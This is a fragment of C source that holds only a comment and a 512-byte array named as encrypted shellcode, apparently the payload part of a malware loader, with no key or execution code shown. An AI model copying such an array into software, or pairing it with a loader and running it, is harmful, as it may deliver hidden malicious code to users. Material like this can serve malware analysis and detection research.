// encryptedShellcode (512 bytes)
BYTE encryptedShellcode[] = {
    0x77, 0x44, 0x0E, 0x15, 0xE0, 0xC2, 0x67, 0xF0, 0x42, 0x40, 0xAE, 0xFA, 
    0x8B, 0xB1, 0x3E, 0xB4, 0xAB, 0xEB, 0x10, 0xD9, 0x49, 0x4B, 0x9B, 0x11, 
    0xF4, 0xC7, 0x09, 0xAD, 0x9E, 0x9F, 0x82, 0x7D, 0xF8, 0x17, 0x09, 0xA1, 
    0xB6, 0x1D, 0x53, 0xB1, 0x82, 0x32, 0x0E, 0x94, 0x0B, 0x41, 0x1C, 0xD8, 
    0x6B, 0xED, 0x8F, 0xD1, 0x79, 0xD5, 0x80, 0x5A, 0x90, 0xC7, 0x04, 0x33, 
    0x99, 0x4C, 0x77, 0xAC, 0x4D, 0xDD, 0x01, 0x60, 0x4E, 0xE1, 0x10, 0xFB, 
    0x95, 0x89, 0x9E, 0xDE, 0x9D, 0x0B, 0xF1, 0xFE, 0x6B, 0x3F, 0xCB, 0x5F, 
    0x4D, 0x7C, 0x00, 0x28, 0x00, 0xD9, 0xB4, 0x82, 0x25, 0x8A, 0x11, 0x16, 
    0xAB, 0xFF, 0xFE, 0xEC, 0x78, 0x20, 0xF2, 0x09, 0x3F, 0x0E, 0x76, 0x61, 
    0xB5, 0xE1, 0x74, 0x4C, 0x72, 0x48, 0x9C, 0xC4, 0xA2, 0xEB, 0xE4, 0xA2, 
    0x57, 0x6B, 0x49, 0xED, 0x21, 0x27, 0x90, 0x6A, 0x9C, 0x81, 0x62, 0x17, 
    0xC5, 0x56, 0x5F, 0x0F, 0x4F, 0x5D, 0x55, 0x5A, 0x0E, 0x41, 0x92, 0xAD, 
    0xF9, 0xC5, 0xD7, 0x9C, 0x8E, 0x71, 0x37, 0x52, 0xF5, 0xE2, 0x6D, 0x4E, 
    0x34, 0x32, 0xD7, 0x99, 0xB2, 0x29, 0x7C, 0x5E, 0xB4, 0x32, 0x9B, 0x3D, 
    0xCB, 0x46, 0xE7, 0xB9, 0x81, 0xC4, 0x3E, 0x28, 0x62, 0x12, 0x0C, 0xBA, 
    0xF5, 0x73, 0x1D, 0x0B, 0x03, 0xC9, 0xB8, 0x44, 0xEB, 0xDE, 0x35, 0x35, 
    0x17, 0x0C, 0x1E, 0xDA, 0x9A, 0x86, 0xE9, 0x8A, 0x5F, 0x2F, 0xE7, 0x06, 
    0x0D, 0x2A, 0x56, 0x69, 0xB4, 0x47, 0x8D, 0xE0, 0xE0, 0x47, 0xAF, 0x33, 
    0x08, 0x03, 0x20, 0xE5, 0x3E, 0x03, 0x56, 0x7E, 0x5E, 0xDA, 0x0C, 0x2A, 
    0x35, 0x64, 0x06, 0x6C, 0x30, 0x21, 0xDA, 0x6C, 0x2F, 0xAC, 0x3B, 0xD9, 
    0x4C, 0x2E, 0xA2, 0x4E, 0x55, 0xFE, 0xB9, 0x83, 0x5B, 0x6B, 0x62, 0xF9, 
    0xBE, 0xAC, 0x5C, 0x73, 0x01, 0x3E, 0xAE, 0x84, 0x51, 0xFA, 0xCD, 0xE1, 
    0x49, 0x98, 0xA9, 0xCF, 0x04, 0x50, 0xF5, 0xEA, 0x42, 0xDD, 0x9A, 0x2F, 
    0xCA, 0xAA, 0x44, 0xD5, 0xEC, 0x3D, 0xA0, 0x18, 0xF8, 0x6B, 0xAD, 0x19, 
    0x1E, 0x44, 0xEF, 0x09, 0x16, 0xC8, 0x17, 0x8E, 0xE9, 0x34, 0x7B, 0x33, 
    0x59, 0xB5, 0x7E, 0xED, 0xDD, 0x94, 0xAE, 0x31, 0x95, 0xAE, 0x57, 0x76, 
    0x9D, 0xC5, 0x14, 0xF3, 0x44, 0x96, 0xC6, 0xD1, 0x33, 0x50, 0xEC, 0x54, 
    0x57, 0x58, 0x0D, 0x11, 0xCE, 0xB5, 0x76, 0x88, 0x12, 0xF1, 0x6B, 0x94, 
    0x5E, 0x1A, 0x8C, 0x50, 0x58, 0xD5, 0xCC, 0x22, 0x52, 0xE9, 0x86, 0xAB, 
    0x64, 0x3F, 0x9C, 0x48, 0x47, 0x35, 0x22, 0x05, 0x9B, 0x18, 0x8E, 0xBB, 
    0x1F, 0xEF, 0xA2, 0x6B, 0x47, 0x8C, 0x06, 0xCE, 0x21, 0xF9, 0xD6, 0x93, 
    0x14, 0x16, 0xB2, 0xB9, 0xC6, 0x10, 0x14, 0x4A, 0x64, 0x2A, 0x37, 0x92, 
    0xC3, 0x81, 0x96, 0x79, 0x53, 0x46, 0x5C, 0xA4, 0xA0, 0x0E, 0xD2, 0xEA, 
    0x9E, 0xE4, 0xC3, 0x02, 0xF1, 0x68, 0x2B, 0x30, 0x33, 0x35, 0x3E, 0xB9, 
    0xB0, 0x5A, 0x0D, 0xF0, 0x6B, 0xA6, 0x96, 0x0D, 0x42, 0x30, 0xB1, 0x6A, 
    0x13, 0x99, 0xF7, 0x70, 0x45, 0xD7, 0x94, 0xEB, 0x88, 0x6F, 0x4E, 0xA0, 
    0x46, 0xC7, 0xDF, 0x13, 0x4C, 0xA7, 0x1F, 0x84, 0x13, 0x28, 0xE5, 0xAA, 
    0xB4, 0x3E, 0xF6, 0x95, 0x8E, 0x3C, 0x79, 0x32, 0xEC, 0x06, 0x68, 0xE4, 
    0x43, 0x6F, 0x29, 0xA8, 0x23, 0x27, 0x6B, 0x63, 0x82, 0x8B, 0xFD, 0x35, 
    0x2A, 0x1B, 0x9A, 0xA2, 0xEC, 0xD3, 0xF8, 0x65, 0x4D, 0x7A, 0x9F, 0xE1, 
    0xD5, 0xE6, 0x1F, 0x3A, 0xF3, 0xF0, 0x99, 0xAF, 0x6A, 0x1C, 0xD7, 0xD3, 
    0xBF, 0x45, 0xFC, 0xBB, 0xDB, 0xA1, 0x43, 0x5D, 0x64, 0x03, 0x52, 0x85, 
    0x40, 0x4E, 0x43, 0xC2, 0x87, 0x89, 0x0A, 0xD6
};
